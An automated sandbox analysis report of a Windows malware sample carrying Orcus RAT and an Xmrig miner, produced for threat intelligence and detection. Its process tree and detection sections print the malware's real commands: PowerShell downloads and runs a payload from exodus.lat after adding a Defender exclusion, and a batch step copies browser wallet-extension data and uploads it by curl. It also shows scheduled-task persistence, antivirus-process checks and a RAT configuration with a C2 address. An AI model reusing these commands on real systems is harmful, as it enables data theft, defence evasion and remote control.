Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DM6vAAgoCw.exe

Overview

General Information

Sample name:DM6vAAgoCw.exe
renamed because original name is a hash value
Original sample name:a67e34baacfca98f323981d3b0087f3b.exe
Analysis ID:1569756
MD5:a67e34baacfca98f323981d3b0087f3b
SHA1:d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256:6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
Tags:exeuser-abuse_ch
Infos:

Detection

Orcus, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected Orcus RAT
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Browser Data Stealing
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DM6vAAgoCw.exe (PID: 3420 cmdline: "C:\Users\user\Desktop\DM6vAAgoCw.exe" MD5: A67E34BAACFCA98F323981D3B0087F3B)
    • cmd.exe (PID: 4188 cmdline: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5760 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5368 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1340 cmdline: cmd /c md 491505 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 2536 cmdline: cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dr.com (PID: 4632 cmdline: Dr.com B MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • cmd.exe (PID: 616 cmdline: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 4052 cmdline: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 3632 cmdline: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 6884 cmdline: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • cmd.exe (PID: 6352 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 5348 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
              • net1.exe (PID: 4388 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
            • powershell.exe (PID: 1020 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 6596 cmdline: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 2876 cmdline: powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • COMSurrogate.exe (PID: 4916 cmdline: "C:\Users\user\AppData\Local\asm\COMSurrogate.exe" MD5: 77334F046A50530CDC6E585E59165264)
          • cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 1816 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
              • net1.exe (PID: 3088 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
            • powershell.exe (PID: 4208 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 7160 cmdline: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 3416 cmdline: powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 3928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6920 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • cmd.exe (PID: 6328 cmdline: cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • xcopy.exe (PID: 6556 cmdline: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • xcopy.exe (PID: 2716 cmdline: xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • cmd.exe (PID: 5552 cmdline: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • curl.exe (PID: 2016 cmdline: curl -s https://api.ipify.org MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
              • powershell.exe (PID: 1924 cmdline: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 2036 cmdline: C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • curl.exe (PID: 6292 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • smartscreen.exe (PID: 712 cmdline: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
      • choice.exe (PID: 5412 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1224 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ApolloPro.scr (PID: 4016 cmdline: "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E" MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
  • smartscreen.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
  • COMSurrogate.exe (PID: 912 cmdline: "C:\Users\user\AppData\Local\asm\COMSurrogate.exe" MD5: 77334F046A50530CDC6E585E59165264)
  • smartscreen.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
  • COMSurrogate.exe (PID: 3132 cmdline: "C:\Users\user\AppData\Local\asm\COMSurrogate.exe" MD5: 77334F046A50530CDC6E585E59165264)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Orcus RATOrcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: OrcusRAT

{"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "Orcus", "TaskHighestPrivileges": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Orcus", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2024-11-27T14:29:12"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": null}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "45.74.38.211", "Port": "4782"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Orcus"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "false"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET45"}, "HideFileBuilderProperty": {"HideFile": "false"}, "InstallationLocationBuilderProperty": {"Path": "%programfiles%\\Orcus\\Orcus.exe"}, "InstallBuilderProperty": {"Install": "false"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "7a9c0f279c464958aebbd585f20f1cf2"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "false", "TaskName": "Orcus Respawner"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "false"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "OrcusWatchdog.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\download.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Local\Temp\downloaded_script.batJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\checkmiexe.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Users\user\AppData\Local\Temp\smartscreen.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          C:\Users\user\AppData\Local\asm\COMSurrogate.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 4 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x463d0:$a1: mining.set_target
                • 0x40ea0:$a2: XMRIG_HOSTNAME
                • 0x42f78:$a3: Usage: xmrig [OPTIONS]
                • 0x40e78:$a4: XMRIG_VERSION
                0000002B.00000002.3921696825.000000000050E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0000002C.00000002.3922955190.0000000002820000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 37 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    47.0.COMSurrogate.exe.1ee64180000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      31.0.smartscreen.exe.1eb2ab20000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        22.2.RegAsm.exe.3c9d977.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                          22.2.RegAsm.exe.3c9d977.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                            22.2.RegAsm.exe.3c7491a.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                              Click to see the 14 entries

                              Other

                              SourceRuleDescriptionAuthorStrings
                              amsi32_6596.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                amsi32_7160.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                                  Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, ProcessName: RegAsm.exe
                                  Sigma detected: Files With System Process Name In Unsuspected Locations
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 616, ProcessName: cmd.exe
                                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 616, ProcessName: cmd.exe
                                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\smartscreen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ProcessId: 712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen
                                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", ProcessId: 1020, ProcessName: powershell.exe
                                  Sigma detected: Powerup Write Hijack DLL
                                  Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6920, TargetFilename: C:\Users\user\AppData\Local\Temp\downloaded_script.bat
                                  Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 4052, ProcessName: schtasks.exe
                                  Sigma detected: Suspicious Invoke-WebRequest Execution
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Script Execution From Temp Folder
